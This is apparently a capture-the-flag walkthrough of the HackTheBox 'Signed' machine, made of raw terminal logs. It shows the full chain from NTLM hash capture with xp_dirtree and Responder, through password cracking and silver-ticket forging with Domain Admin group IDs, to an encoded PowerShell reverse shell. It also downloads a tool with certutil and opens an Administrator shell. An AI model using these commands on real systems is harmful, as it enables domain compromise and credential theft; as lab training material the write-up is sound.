Here is my note on SIGNED box from Hackthebox.
SIGNED: 10.10.11.90
As is common in real life Windows penetration tests, you will start the Signed box with credentials for the following account which can be used to access the MSSQL service: scott / Sm230#C5NatH
PORT STATE SERVICE VERSION
1433/tcp open ms-sql-s Microsoft SQL Server 2022 16.00.1000.00; RC0+
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2025-10-31T04:03:19
|_Not valid after: 2055-10-31T04:03:19
|_ssl-date: 2025-11-02T18:08:53+00:00; +1s from scanner time.
|_ms-sql-info: ERROR: Script execution failed (use -d to debug)
|_ms-sql-ntlm-info: ERROR: Script execution failed (use -d to debug)
scott:Sm230#C5NatH
impacket-mssqlclient scott:Sm230#C5NatH@10.10.11.90 -windows-auth #NOPE
Escalating From MSSQL Silver Ticket to Domain Admin: #SIGNED-HTB
impacket-mssqlclient scott:Sm230#C5NatH@10.10.11.90 #WORKS
┌──(root㉿kali)-[/home/…/BOXES/SIGNED/10.10.11.90/nmap]
└─# impacket-mssqlclient scott:Sm230#C5NatH@10.10.11.90
Impacket v0.13.0 - Copyright Fortra, LLC and its affiliated companies
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC01): Line 1: Changed database context to 'master'.
[*] INFO(DC01): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server 2022 RTM (16.0.1000)
[!] Press help for extra shell commands
SQL (scott guest@master)>
┌──(root㉿kali)-[/home/…/BOXES/SIGNED/10.10.11.90/nmap]
└─# impacket-mssqlclient scott:Sm230#C5NatH@10.10.11.90
Impacket v0.13.0 - Copyright Fortra, LLC and its affiliated companies
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC01): Line 1: Changed database context to 'master'.
[*] INFO(DC01): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server 2022 RTM (16.0.1000)
[!] Press help for extra shell commands
SQL (scott guest@master)> enum_links;
SRV_NAME SRV_PROVIDERNAME SRV_PRODUCT SRV_DATASOURCE SRV_PROVIDERSTRING SRV_LOCATION SRV_CAT
-------- ---------------- ----------- -------------- ------------------ ------------ -------
DC01 SQLNCLI SQL Server DC01 NULL NULL NULL
Linked Server Local Login Is Self Mapping Remote Login
------------- ----------- --------------- ------------
SQL (scott guest@master)> enable_xp_cmdshell;
ERROR(DC01): Line 105: User does not have permission to perform this action.
ERROR(DC01): Line 1: You do not have permission to run the RECONFIGURE statement.
ERROR(DC01): Line 105: User does not have permission to perform this action.
ERROR(DC01): Line 1: You do not have permission to run the RECONFIGURE statement.
SELECT name FROM sys.databases;
SQL (scott guest@master)> SELECT name FROM sys.databases;
name
------
master
tempdb
model
msdb
#NOTHING INTERESTING.
xp_dirtree '\\10.10.14.142\a';
SQL (scott guest@master)> xp_dirtree \\10.10.14.142\a;
subdirectory depth file
------------ ----- ----
Responder:
sudo responder -I tun1
[SNIP]
[SMB] NTLMv2-SSP Client : 10.10.11.90
[SMB] NTLMv2-SSP Username : SIGNED\mssqlsvc
[SMB] NTLMv2-SSP Hash : mssqlsvc::SIGNED:e5f6163c4fbce3cc:62BA233C1B8F44760CED6262F41E4D8A:01010000000000008073426CB150DC0199AE29FF1964291300000000020008004300300042004C0001001E00570049004E002D00380051004800510052004200330055004A003700450004003400570049004E002D00380051004800510052004200330055004A00370045002E004300300042004C002E004C004F00430041004C00030014004300300042004C002E004C004F00430041004C00050014004300300042004C002E004C004F00430041004C00070008008073426CB150DC01060004000200000008003000300000000000000000000000003000001DE8B8AAFC69B945F6E45499405E964D1A264F31CDEB21CAC01FCEB2F7B5BDAA0A001000000000000000000000000000000000000900220063006900660073002F00310030002E00310030002E00310034002E003100340032000000000000000000
mssqlsvc::SIGNED:e5f6163c4fbce3cc:62BA233C1B8F44760CED6262F41E4D8A:01010000000000008073426CB150DC0199AE29FF1964291300000000020008004300300042004C0001001E00570049004E002D00380051004800510052004200330055004A003700450004003400570049004E002D00380051004800510052004200330055004A00370045002E004300300042004C002E004C004F00430041004C00030014004300300042004C002E004C004F00430041004C00050014004300300042004C002E004C004F00430041004C00070008008073426CB150DC01060004000200000008003000300000000000000000000000003000001DE8B8AAFC69B945F6E45499405E964D1A264F31CDEB21CAC01FCEB2F7B5BDAA0A001000000000000000000000000000000000000900220063006900660073002F00310030002E00310030002E00310034002E003100340032000000000000000000
┌──(root㉿kali)-[/home/…/BOXES/SIGNED/10.10.11.90/nmap]
└─# john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
purPLE9795!@ (mssqlsvc)
1g 0:00:00:07 DONE (2025-11-08 13:15) 0.1400g/s 628454p/s 628454c/s 628454C/s purcitititya..puppuh
Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably
Session completed.
mssqlsvc:purPLE9795!@
impacket-mssqlclient 'mssqlsvc:purPLE9795!@'@10.10.11.90
┌──(root㉿kali)-[/home/…/BOXES/SIGNED/10.10.11.90/nmap]
└─# impacket-mssqlclient 'mssqlsvc:purPLE9795!@'@10.10.11.90 -windows-auth
Impacket v0.13.0 - Copyright Fortra, LLC and its affiliated companies
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC01): Line 1: Changed database context to 'master'.
[*] INFO(DC01): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server 2022 RTM (16.0.1000)
[!] Press help for extra shell commands
SQL (SIGNED\mssqlsvc guest@master)>
Looks like we can convert it to a silver ticket and gain a sa out of it ?
SELECT distinct b.name FROM sys.server_permissions a INNER JOIN sys.server_principals b ON a.grantor_principal_id = b.principal_id WHERE a.permission_name = 'IMPERSONATE'
#NOTHING.
SELECT r.name AS role, m.name AS member FROM sys.server_principals r JOIN sys.server_role_members rm ON r.principal_id = rm.role_principal_id JOIN sys.server_principals m ON rm.member_principal_id = m.principal_id WHERE r.name = 'sysadmin';
SQL (SIGNED\mssqlsvc guest@master)> SELECT r.name AS role, m.name AS member FROM sys.server_principals r JOIN sys.server_role_members rm ON r.principal_id = rm.role_principal_id JOIN sys.server_principals m ON rm.member_principal_id = m.principal_id WHERE r.name = 'sysadmin';
role member
-------- -------------------------
sysadmin sa
sysadmin SIGNED\IT
sysadmin NT SERVICE\SQLWriter
sysadmin NT SERVICE\Winmgmt
sysadmin NT SERVICE\MSSQLSERVER
sysadmin NT SERVICE\SQLSERVERAGENT
SQL (SIGNED\mssqlsvc guest@master)> enum_users;
UserName RoleName LoginName DefDBName DefSchemaName UserID SID
--------------------------------- -------- --------------------------------- --------- ------------- ---------- -------------------------------------------------------------------
##MS_AgentSigningCertificate## public ##MS_AgentSigningCertificate## master NULL b'6 ' b'010600000000000901000000fb1b6ce60eda55e1d3dde93b99db322bfc435563'
##MS_PolicyEventProcessingLogin## public ##MS_PolicyEventProcessingLogin## master dbo b'5 ' b'56f12609fb4eb548906b5a62effb1840'
dbo db_owner sa master dbo b'1 ' b'01'
guest public NULL NULL guest b'2 ' b'00'
INFORMATION_SCHEMA public NULL NULL NULL b'3 ' NULL
sys public NULL NULL NULL b'4 '
SQL (SIGNED\mssqlsvc guest@master)> select default_domain()
------
SIGNED
SELECT DEFAULT_DOMAIN();
SELECT SUSER_SID('SIGNED\Domain Admins')
SQL (SIGNED\mssqlsvc guest@master)> SELECT SUSER_SID('SIGNED\Domain Admins')
-----------------------------------------------------------
b'0105000000000005150000005b7bb0f398aa2245ad4a1ca400020000'
$BinarySID = "0105000000000005150000005b7bb0f398aa2245ad4a1ca400020000"
$SIDBytes = [byte[]]::new($BinarySID.Length / 2)
for ($i = 0; $i -lt $BinarySID.Length; $i += 2) {
$SIDBytes[$i / 2] = [convert]::ToByte($BinarySID.Substring($i, 2), 16)
}
$SID = New-Object System.Security.Principal.SecurityIdentifier($SIDBytes, 0)
$SID.Value
PS C:\Users\User> $BinarySID = "0105000000000005150000005b7bb0f398aa2245ad4a1ca400020000"
PS C:\Users\User> $SIDBytes = [byte[]]::new($BinarySID.Length / 2)
PS C:\Users\User> for ($i = 0; $i -lt $BinarySID.Length; $i += 2) {
>> $SIDBytes[$i / 2] = [convert]::ToByte($BinarySID.Substring($i, 2), 16)
>> }
PS C:\Users\User> $SID = New-Object System.Security.Principal.SecurityIdentifier($SIDBytes, 0)
PS C:\Users\User> $SID.Value
S-1-5-21-4088429403-1159899800-2753317549-512
S-1-5-21-4088429403-1159899800-2753317549-512 #SIGNED\DOMAIN ADMIN
SELECT SUSER_SID('SIGNED\IT')
SQL (SIGNED\mssqlsvc guest@master)> SELECT SUSER_SID('SIGNED\IT')
-----------------------------------------------------------
b'0105000000000005150000005b7bb0f398aa2245ad4a1ca451040000'
$BinarySID = "0105000000000005150000005b7bb0f398aa2245ad4a1ca451040000"
$SIDBytes = [byte[]]::new($BinarySID.Length / 2)
for ($i = 0; $i -lt $BinarySID.Length; $i += 2) {
$SIDBytes[$i / 2] = [convert]::ToByte($BinarySID.Substring($i, 2), 16)
}
$SID = New-Object System.Security.Principal.SecurityIdentifier($SIDBytes, 0)
$SID.Value
PS C:\Users\User> $BinarySID = "0105000000000005150000005b7bb0f398aa2245ad4a1ca451040000"
PS C:\Users\User> $SIDBytes = [byte[]]::new($BinarySID.Length / 2)
PS C:\Users\User> for ($i = 0; $i -lt $BinarySID.Length; $i += 2) {
>> $SIDBytes[$i / 2] = [convert]::ToByte($BinarySID.Substring($i, 2), 16)
>> }
PS C:\Users\User> $SID = New-Object System.Security.Principal.SecurityIdentifier($SIDBytes, 0)
PS C:\Users\User> $SID.Value
S-1-5-21-4088429403-1159899800-2753317549-1105
PS C:\Users\User>
S-1-5-21-4088429403-1159899800-2753317549-1105 #SIGNED\IT
SELECT SUSER_SID('SIGNED\mssqlsvc')
SQL (SIGNED\mssqlsvc guest@master)> SELECT SUSER_SID('SIGNED\mssqlsvc')
-----------------------------------------------------------
b'0105000000000005150000005b7bb0f398aa2245ad4a1ca44f040000'
$BinarySID = "0105000000000005150000005b7bb0f398aa2245ad4a1ca44f040000"
$SIDBytes = [byte[]]::new($BinarySID.Length / 2)
for ($i = 0; $i -lt $BinarySID.Length; $i += 2) {
$SIDBytes[$i / 2] = [convert]::ToByte($BinarySID.Substring($i, 2), 16)
}
$SID = New-Object System.Security.Principal.SecurityIdentifier($SIDBytes, 0)
$SID.Value
PS C:\Users\User> $BinarySID = "0105000000000005150000005b7bb0f398aa2245ad4a1ca44f040000"
PS C:\Users\User> $SIDBytes = [byte[]]::new($BinarySID.Length / 2)
PS C:\Users\User> for ($i = 0; $i -lt $BinarySID.Length; $i += 2) {
>> $SIDBytes[$i / 2] = [convert]::ToByte($BinarySID.Substring($i, 2), 16)
>> }
PS C:\Users\User> $SID = New-Object System.Security.Principal.SecurityIdentifier($SIDBytes, 0)
PS C:\Users\User> $SID.Value
S-1-5-21-4088429403-1159899800-2753317549-1103
PS C:\Users\User>
S-1-5-21-4088429403-1159899800-2753317549-1103 #SIGNED\mssqlsvc
S-1-5-21-4088429403-1159899800-2753317549 = DOMAIN SID
ticketer.py -nthash EF699384C3285C54128A3EE1DDB1A0CC \
-domain-sid S-1-5-21-4088429403-1159899800-2753317549 \
-domain signed.htb \
-spn MSSQLSvc/DC01.signed.htb:1433 \
-groups 1105 \
-user-id 1103 \
mssqlsvc
export KRB5CCNAME=mssqlsvc.ccache
mssqlclient.py -k -no-pass dc01.signed.htb
┌──(root㉿kali)-[/home/…/BOXES/SIGNED/10.10.11.90/nmap]
└─# ticketer.py -nthash EF699384C3285C54128A3EE1DDB1A0CC \
-domain-sid S-1-5-21-4088429403-1159899800-2753317549 \
-domain signed.htb \
-spn MSSQLSvc/DC01.signed.htb:1433 \
-groups 1105 \
-user-id 1103 \
mssqlsvc
Impacket v0.13.0 - Copyright Fortra, LLC and its affiliated companies
[*] Creating basic skeleton ticket and PAC Infos
[*] Customizing ticket for signed.htb/mssqlsvc
[*] PAC_LOGON_INFO
[*] PAC_CLIENT_INFO_TYPE
[*] EncTicketPart
[*] EncTGSRepPart
[*] Signing/Encrypting final ticket
[*] PAC_SERVER_CHECKSUM
[*] PAC_PRIVSVR_CHECKSUM
[*] EncTicketPart
[*] EncTGSRepPart
[*] Saving ticket in mssqlsvc.ccache
┌──(root㉿kali)-[/home/…/BOXES/SIGNED/10.10.11.90/nmap]
└─# export KRB5CCNAME=mssqlsvc.ccache
┌──(root㉿kali)-[/home/…/BOXES/SIGNED/10.10.11.90/nmap]
└─# mssqlclient.py -k -no-pass dc01.signed.htb
Impacket v0.13.0 - Copyright Fortra, LLC and its affiliated companies
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC01): Line 1: Changed database context to 'master'.
[*] INFO(DC01): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server 2022 RTM (16.0.1000)
[!] Press help for extra shell commands
SQL (SIGNED\mssqlsvc dbo@master)> enable_xp_cmdshell
INFO(DC01): Line 196: Configuration option 'show advanced options' changed from 1 to 1. Run the RECONFIGURE statement to install.
INFO(DC01): Line 196: Configuration option 'xp_cmdshell' changed from 1 to 1. Run the RECONFIGURE statement to install.
SQL (SIGNED\mssqlsvc dbo@master)> xp_cmdshell "whoami"
output
---------------
signed\mssqlsvc
NULL
RCE-WORKS !
xp_cmdshell "powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA0AC4AMQA0ADIAIgAsADEAMgAzADQAKQA7ACQAcwB0AHIAZQBhAG0AIAA9ACAAJABjAGwAaQBlAG4AdAAuAEcAZQB0AFMAdAByAGUAYQBtACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAGIAeQB0AGUAcwAgAD0AIAAwAC4ALgA2ADUANQAzADUAfAAlAHsAMAB9ADsAdwBoAGkAbABlACgAKAAkAGkAIAA9ACAAJABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7ADsAJABkAGEAdABhACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AVAB5AHAAZQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AQQBTAEMASQBJAEUAbgBjAG8AZABpAG4AZwApAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAcwAsADAALAAgACQAaQApADsAJABzAGUAbgBkAGIAYQBjAGsAIAA9ACAAKABpAGUAeAAgACQAZABhAHQAYQAgADIAPgAmADEAIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwAgACkAOwAkAHMAZQBuAGQAYgBhAGMAawAyACAAPQAgACQAcwBlAG4AZABiAGEAYwBrACAAKwAgACIAUABTACAAIgAgACsAIAAoAHAAdwBkACkALgBQAGEAdABoACAAKwAgACIAPgAgACIAOwAkAHMAZQBuAGQAYgB5AHQAZQAgAD0AIAAoAFsAdABlAHgAdAAuAGUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkAKQAuAEcAZQB0AEIAeQB0AGUAcwAoACQAcwBlAG4AZABiAGEAYwBrADIAKQA7ACQAcwB0AHIAZQBhAG0ALgBXAHIAaQB0AGUAKAAkAHMAZQBuAGQAYgB5AHQAZQAsADAALAAkAHMAZQBuAGQAYgB5AHQAZQAuAEwAZQBuAGcAdABoACkAOwAkAHMAdAByAGUAYQBtAC4ARgBsAHUAcwBoACgAKQB9ADsAJABjAGwAaQBlAG4AdAAuAEMAbABvAHMAZQAoACkA"
┌──(root㉿kali)-[/home/…/BOXES/SIGNED/10.10.11.90/nmap]
└─# sudo rlwrap nc -lnvp 1234
listening on [any] 1234 ...
connect to [10.10.14.142] from (UNKNOWN) [10.10.11.90] 49855
whoami
signed\mssqlsvc
PS C:\Windows\system32> hostname
DC01
USER-SHELL !
PS C:\Users\mssqlsvc\Desktop> whoami
signed\mssqlsvc
PS C:\Users\mssqlsvc\Desktop> hostname
DC01
PS C:\Users\mssqlsvc\Desktop> dir
Directory: C:\Users\mssqlsvc\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 11/6/2025 8:01 PM 34 user.txt
PS C:\Users\mssqlsvc\Desktop> type user.txt
[REDIRECTED]
USER.TXT: [REDIRECTED]
PRIV ESC:
Go back to forge a silver ticket with Domain Admin and Enterprise Admin RIDs (512-519) along with IT Group (1105).
ticketer.py -nthash EF699384C3285C54128A3EE1DDB1A0CC \
-domain-sid S-1-5-21-4088429403-1159899800-2753317549 \
-domain signed.htb \
-spn MSSQLSvc/DC01.signed.htb:1433 \
-groups 512,519,1105 \
-user-id 1103 \
mssqlsvc
export KRB5CCNAME=mssqlsvc.ccache
mssqlclient.py -k -no-pass dc01.signed.htb
┌──(root㉿kali)-[/home/…/BOXES/SIGNED/10.10.11.90/nmap]
└─# ticketer.py -nthash EF699384C3285C54128A3EE1DDB1A0CC \
-domain-sid S-1-5-21-4088429403-1159899800-2753317549 \
-domain signed.htb \
-spn MSSQLSvc/DC01.signed.htb:1433 \
-groups 512,519,1105 \
-user-id 1103 \
mssqlsvc
Impacket v0.13.0 - Copyright Fortra, LLC and its affiliated companies
[*] Creating basic skeleton ticket and PAC Infos
[*] Customizing ticket for signed.htb/mssqlsvc
[*] PAC_LOGON_INFO
[*] PAC_CLIENT_INFO_TYPE
[*] EncTicketPart
[*] EncTGSRepPart
[*] Signing/Encrypting final ticket
[*] PAC_SERVER_CHECKSUM
[*] PAC_PRIVSVR_CHECKSUM
[*] EncTicketPart
[*] EncTGSRepPart
[*] Saving ticket in mssqlsvc.ccache
┌──(root㉿kali)-[/home/…/BOXES/SIGNED/10.10.11.90/nmap]
└─# export KRB5CCNAME=mssqlsvc.ccache
┌──(root㉿kali)-[/home/…/BOXES/SIGNED/10.10.11.90/nmap]
└─# mssqlclient.py -k -no-pass dc01.signed.htb
Impacket v0.13.0 - Copyright Fortra, LLC and its affiliated companies
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC01): Line 1: Changed database context to 'master'.
[*] INFO(DC01): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server 2022 RTM (16.0.1000)
[!] Press help for extra shell commands
SQL (SIGNED\mssqlsvc dbo@master)>
xp_cmdshell is the same as mssqlsvc but technically we can access the files with administrator privileges so the RCE is mssql but you can list everything with adminstrator privilege within the silver ticket (512 and 519).
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'Ad Hoc Distributed Queries', 1;
RECONFIGURE;
SELECT * FROM OPENROWSET(BULK 'C:\Users\Administrator\Desktop\root.txt',SINGLE_CLOB) AS x;
SELECT * FROM OPENROWSET(BULK 'C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt',SINGLE_CLOB) AS x;
[SNIP]
er-ScheduledTask -TaskName "Clean_DNS_Task" -Action $Action -Trigger $Trigger -Settings $Settings -User "SIGNED\\Administrator" -Password "Welcome1"\r\ncd ..\\Documents\\\r\nnotepad restart.ps1\r\nexplorer .\r\ndir ..\\Desktop\\\r\nmove ..\\Desktop\\cleanup.ps1 .\r\ndir ..\\Desktop\\\r\ndir\r\nGet-NetConnectionProfile\r\nSet-ADAccountPassword -Identity "Administrator" -NewPassword (ConvertTo-SecureString "Th1s889Rabb!t" -AsPlainText -Force) -Reset\r\nSet-Service TermService -StartupType disabled\r\nexit\r\nGet-NetConnectionProfile\r\nnltest /dsgetdc:signed.htb\r\nwusa /uninstall /kb:5065428\r\niwr http://10.10.11.90:81/vmt.exe -O vmt.exe\r\niwr http://10.10.14.62:81/vmt.exe -O vmt.exe\r\n.\\vmt.exe\r\ndel .\\vmt.exe\r\nmanage-bde -off c:\\\r\ndisable-bitlocker -mountpoint c:\\\r\npowershell iwr https://catalog.s.download.windowsupdate.com/c/msdownload/update/software/secu/2024/06/windows10.0-kb5039217-x64_bc72f4ed75c
Administrator:Th1s889Rabb!t
We found an Administrator credential.
xp_cmdshell "certutil.exe -urlcache -split -f http://10.10.14.142/RunasCs.exe C:\Users\Public\RunasCs.exe"
xp_cmdshell "C:\Users\Public\RunasCs.exe Administrator Th1s889Rabb!t powershell.exe -r 10.10.14.142:4444"
impacket-mssqlclient Administrator:'Th1s889Rabb!t'@10.10.11.90 -windows-auth #NOPE, guest due administrator user didn't assign to SA privilege.
┌──(root㉿kali)-[/home/…/BOXES/SIGNED/10.10.11.90/nmap]
└─# sudo rlwrap nc -lnvp 4444
listening on [any] 4444 ...
connect to [10.10.14.142] from (UNKNOWN) [10.10.11.90] 51440
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
PS C:\Windows\system32> whoami
whoami
signed\administrator
PS C:\Windows\system32> hostname
hostname
DC01
ADMINISTRATOR SHELL !
PS C:\Users\Administrator\Desktop> whoami
whoami
signed\administrator
PS C:\Users\Administrator\Desktop> hostname
hostname
DC01
PS C:\Users\Administrator\Desktop> dir
dir
Directory: C:\Users\Administrator\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 11/6/2025 8:01 PM 34 root.txt
PS C:\Users\Administrator\Desktop> type root.txt
type root.txt
[REDIRECTED]
ROOT.TXT: [REDIRECTED]
DON'T WORK:
script.sh:
#!/bin/bash
USERNAME="mssqlsvc"
PASSWORD="purPLE9795!@"
SERVER="signed.htb"
SID_BASE="S-1-5-21-4088429403-1159899800-2753317549"
for SID in {1100..1200}; do
QUERY="SELECT SUSER_SNAME(SID_BINARY(N'$SID_BASE-$SID'))"
echo "$QUERY" > query.sql
mssqlclient.py "$USERNAME:$PASSWORD@$SERVER" -file query.sql | grep -a SIGNED
rm query.sql
done
ticketer.py -nthash EF699384C3285C54128A3EE1DDB1A0CC \
-domain-sid S-1-5-21-4088429403-1159899800-2753317549 \
-domain signed.htb \
-spn MSSQLSvc/DC01.signed.htb:1433 \
-groups 1105 \
-user-id 1103 \
mssqlsvc
export KRB5CCNAME=mssqlsvc.ccache
mssqlclient.py -k -no-pass dc01.signed.htb
purPLE9795!@:EF699384C3285C54128A3EE1DDB1A0CC
MSSQLSvc/DC01.signed.htb:1433
ticketer.py -nthash EF699384C3285C54128A3EE1DDB1A0CC -domain-sid S-1-5-21-4088429403-1159899800-2753317549 -domain signed.htb Administrator
ticketer.py -nthash EF699384C3285C54128A3EE1DDB1A0CC -domain-sid S-1-5-21-4088429403-1159899800-2753317549 -domain signed.htb -user-id 500 Administrator
ticketer.py -nthash EF699384C3285C54128A3EE1DDB1A0CC -domain-sid S-1-5-21-4088429403-1159899800-2753317549 -domain signed.htb -spn MSSQLSvc/DC01.signed.htb:1433 -user-id 500 Administrator
export KRB5CCNAME=Administrator.ccache
mssqlclient.py -k -no-pass signed.htb/administrator@signed.htb
Non-User Existence:
ticketer.py -nthash 7d8ec69e03b35970bf147311fda8553e -domain-sid S-1-5-212287712982-2792323526-2734958516 -domain vhlnetworklab01.local MasterYoda
export KRB5CCNAME=MasterYoda.ccache
proxychains python3 mssqlclient.py -k -no-pass vhlnetworklab01.local/administrator@WS021.vhlnetworklab01.local ",,,,,,,,,,
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
https://medium.com/@happycamper84/abusing-mssql-391f326003b9
https://stevestedman.com/2025/01/securing-sql-server-disable-ad-hoc-distributed-queries-2/
Hijacking SQL Server Credentials using Agent Jobs for Domain Privilege Escalation
https://h4ms1k.github.io/Red_Team_MSSQL_Server/#
https://www.akamai.com/blog/security/vollgar-ms-sql-servers-under-attack